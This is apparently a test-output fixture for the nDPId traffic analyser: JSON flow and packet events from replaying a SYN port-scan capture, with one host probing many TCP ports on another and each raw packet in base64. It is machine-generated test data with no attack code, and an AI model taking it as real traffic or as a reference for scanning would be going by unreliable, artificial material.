-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAso8MAACYGfq+sEAAIQA2GNIzSB\/vdUoMYAAAAAGACDAAklAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1546,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAs1+sAACYGSoesEAAIQA2GNIzSBArdUoMYAAAAAGACDAAohQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsGmoAACUGCQmsEAAIQA2GNIzSB4\/dUoMYAAAAAGACCAApAAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuV0AACkGZhWsEAAIQA2GNIzTBHvdU4MZAAAAAGACCAAsEQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAspJsAACsGeNesEAAIQA2GNIzTAw\/dU4MZAAAAAGACEAAlfQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsLg8AACoG8GOsEAAIQA2GNIzTGojdU4MZAAAAAGACDAASBAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/UAADIGmn2sEAAIQA2GNIzTHQvdU4MZAAAAAGACDAAPgQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAshW8AADkGigOsEAAIQA2GNIzTAVTdU4MZAAAAAGACCAAvOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAs8AUAADIGJm2sEAAIQA2GNIzTB9LdU4MZAAAAAGACDAAkugAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsrEwAADAGbCasEAAIQA2GNIzTAojdU4MZAAAAAGACBAAyBAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse4wAACkGo+asEAAIQA2GNIzTAnfdU4MZAAAAAGACCAAuFQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuCkAACUGa0msEAAIQA2GNIzTBAndU4MZAAAAAGACCAAsgwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsiJEAACgGl+GsEAAIQA2GNIzTGafdU4MZAAAAAGACBAAa5QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsheEAACgGmpGsEAAIQA2GNIzTCcTdU4MZAAAAAGACBAAqyAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsxa0AACsGV8WsEAAIQA2GNIzTBDndU4MZAAAAAGACEAAkUwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsPY4AADEG2eSsEAAIQA2GNIzTwAndU4MZAAAAAGACCABwggAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4wAADMG5easEAAIQA2GNIzTBdzdU4MZAAAAAGACEAAisAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AMAADIGIm+sEAAIQA2GNIzTAQjdU4MZAAAAAGACDAArhAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpEAADgG5eGsEAAIQA2GNIzTCD\/dU4MZAAAAAGACBAAsTQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xAAADkGLGKsEAAIQA2GNIzTADHdU4MZAAAAAGACCAAwWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsmJ8AACYGidOsEAAIQA2GNIzTD6LdU4MZAAAAAGACDAAc6gAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsMFwAADAG6BasEAAIQA2GNIzTBDTdU4MZAAAAAGACBAAwWAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsgoUAACoGm+2sEAAIQA2GNIzTBd\/dU4MZAAAAAGACDAAmrQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsxtwAADAGUZasEAAIQA2GNIzTF3HdU4MZAAAAAGACBAAdGwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs8kIAADQGIjCsEAAIQA2GNIzTgAPdU4MZAAAAAGACBAC0iAAAAgQFtA=="} 